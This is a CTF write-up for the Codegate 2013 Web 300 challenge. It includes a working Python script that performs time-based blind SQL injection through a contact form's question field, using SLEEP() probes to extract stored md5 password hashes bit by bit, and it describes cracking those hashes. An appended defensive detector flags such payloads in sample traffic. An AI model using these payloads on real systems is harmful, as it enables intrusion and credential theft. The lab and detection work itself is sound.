Computer Security/CTF

[Codegate 2013] Web 300 simple write up

This is a typical blind SQL injection challenge.

Injection is possible in the contact part of the site (the form that sends the name, e-mail, question and message).

I did the blind injection through the question parameter.

That reveals that the members' passwords are stored as md5 hashes, and they can be recovered dictionary-style using online md5 decoding pages.

Looking at the page source, there is hidden JavaScript, and from it you can tell there is a hidden login page.

Logging in as each member in turn then shows who commissioned the Hound hack and when.


[python]

import http.client
import sys
import time
import urllib.parse

# Time-based blind SQL injection through the contact form.
# Stage 1 finds the length of the target expression by asking
# "is length(x) = k?" and timing the response; stage 2 recovers the value
# one character at a time, and each character one bit at a time (8 requests
# per character), using SLEEP(2) as the oracle: a slow response means "true".

# setting: the expression to extract (uncomment the one you want)
#toget = 'database()'
#toget = "(SELECT password from `member` where id=0x666c617368)" #flash
#toget = "(SELECT password from `member` where id=0x7a6f64696163)" #zodiac
#toget = "(SELECT password from `member` where id=0x6c656f70617264)" #leopard
toget = "(SELECT password from `member` where id=0x766963746f72)" #victor
#toget = "(SELECT min(`id`) from `member` where id > 0x766963746f72)"
#toget = "(SELECT group_concat(message) FROM contact)"
#toget = "(SELECT column_name FROM information_schema.columns WHERE table_name=0x6d656d626572 and table_schema=0x7468655f67726579  LIMIT "+sys.argv[1]+",1)"
#toget = "(SELECT table_name FROM information_schema.tables WHERE table_schema=0x7468655f67726579 LIMIT "+sys.argv[1]+",1)"
stage = 2
ck = 'PHPSESSID=equncg53svlebb0ic8u9oouc34'
referer = 'http://58.229.122.17:2218/contact.php'
host, port = "58.229.122.17", 2218
delay = 2  # seconds the SLEEP() payload pauses when the condition is true

print("[*] Stage1: Find Length of " + toget)

answer = ""
length = 0
i = 0   # bits of the current character accumulated so far
j = 1   # current stage (1 = length, 2 = characters)
k = 1   # candidate length in stage 1, character index in stage 2
m = 1   # bit position within the character, 1 = most significant
while j <= stage:
    if j == 1:
        query = "if(length(" + toget + ")= " + str(k) + ",SLEEP(2),1)"
    else:
        # bit m of the k-th character: bin() gives the binary string,
        # LPAD pads it to 8 digits, substr picks one digit, 0x31 is '1'
        query = "if(substr(LPAD(bin(ascii(substr(" + toget + "," + str(k) + ",1))),8,0)," + str(m) + ",1)=0x31,SLEEP(2),1) "
    val = urllib.parse.urlencode({'question': query, 'your_name': 'a', 'your_email': 'a@a.com', 'your_message': 'a', 'contact_submitted': 'send'})
    headers = {'Accept': 'text/html, application/xhtml+xml, */*',
               'Content-type': 'application/x-www-form-urlencoded',
               'Content-length': str(len(val)),
               'Cookie': ck,
               'Referer': referer,
               'Accept-Language': 'ko-KR',
               'User-Agent': 'Mozilla/5.0 (compatible; MSIE 10.6; hello; Trident/6.0)'}
    conn = http.client.HTTPConnection(host, port)
    t1 = time.time()
    conn.connect()
    conn.request('POST', '/contact.php', val, headers)
    response = conn.getresponse()
    data = response.read()
    conn.close()
    t2 = time.time()
    if j == 1:
        print("now: " + str(k))
        if (t2 - t1) > delay:
            length = k
            print("[+] Length: " + str(length))
            print("[*] Stage 2")
            k = 1
            j = 2  # go to stage 2
            continue
        k = k + 1
    else:
        if (t2 - t1) > delay:
            i += pow(2, 8 - m)  # bit m is set
            print(str(m) + " " + str(i))
        if m == 8:
            # all 8 bits collected: emit the character and move to the next one
            answer = answer + chr(i)
            print("Find: " + answer)
            k = k + 1
            i = 0
            m = 1
            if k > length:
                break
            continue  # start the next character at bit 1, do not skip it
        m = m + 1

print("Answer:" + answer)

[/python]
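From the defender's side, the probes above leave a clear trail: every request to contact.php carries a SLEEP() wrapped in if(...) plus the substr/LPAD/bin/ascii chain, and the "true" probes really do take about 2 seconds longer. The following detector is an added example, not part of the original writeup; it runs over constructed sample traffic (session id, path, URL-encoded POST body, response time), which is an assumed log shape, and flags sessions that repeatedly post time-delay payloads.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs

# Time-delay functions that turn a boolean condition into a measurable pause,
# and the string/bit functions the writeup's probes use to read one bit at a time.
TIME_DELAY = re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor)\s*\(", re.I)
CHAR_PROBE = re.compile(r"\b(ascii|substr|substring|lpad|bin|length)\s*\(", re.I)

def classify_body(body):
    """Return the set of indicators found in a URL-encoded POST body."""
    found = set()
    for values in parse_qs(body).values():
        for value in values:
            if TIME_DELAY.search(value):
                found.add("time-delay")
            if CHAR_PROBE.search(value):
                found.add("char-probe")
    return found

def flag_sessions(records, min_hits=3, slow_seconds=2.0):
    """records are (session_id, path, body, response_seconds). A session is
    reported when it posts time-delay payloads at least min_hits times; 'slow'
    counts the probes that actually stalled the server, i.e. a working oracle."""
    hits = defaultdict(list)
    for sid, path, body, secs in records:
        if "time-delay" in classify_body(body):
            hits[sid].append((path, secs))
    report = {}
    for sid, probes in hits.items():
        if len(probes) >= min_hits:
            report[sid] = {
                "requests": len(probes),
                "slow": sum(1 for _, secs in probes if secs >= slow_seconds),
                "paths": sorted({path for path, _ in probes}),
            }
    return report

# Constructed sample traffic (not real server logs): two ordinary contact-form
# submissions and one session replaying the writeup's length and bit probes.
FORM = "&your_name=a&your_email=a%40a.com&your_message=a&contact_submitted=send"
SAMPLE = [
    ("sess-legit", "/contact.php", "question=How+do+I+reset+my+password%3F" + FORM, 0.12),
    ("sess-legit", "/contact.php", "question=I+can%27t+sleep+at+night%2C+please+call" + FORM, 0.10),
    ("sess-probe", "/contact.php", "question=if(length((SELECT+password+from+member))%3D32%2CSLEEP(2)%2C1)" + FORM, 2.31),
    ("sess-probe", "/contact.php", "question=if(substr(LPAD(bin(ascii(substr((SELECT+password+from+member)%2C1%2C1)))%2C8%2C0)%2C1%2C1)%3D0x31%2CSLEEP(2)%2C1)" + FORM, 2.05),
    ("sess-probe", "/contact.php", "question=if(substr(LPAD(bin(ascii(substr((SELECT+password+from+member)%2C1%2C1)))%2C8%2C0)%2C2%2C1)%3D0x31%2CSLEEP(2)%2C1)" + FORM, 0.09),
]
```

The word "sleep" in ordinary text is not flagged because the signature requires a following parenthesis; the per-session slow count separates a probe series that works from one that is being blocked or mistyped.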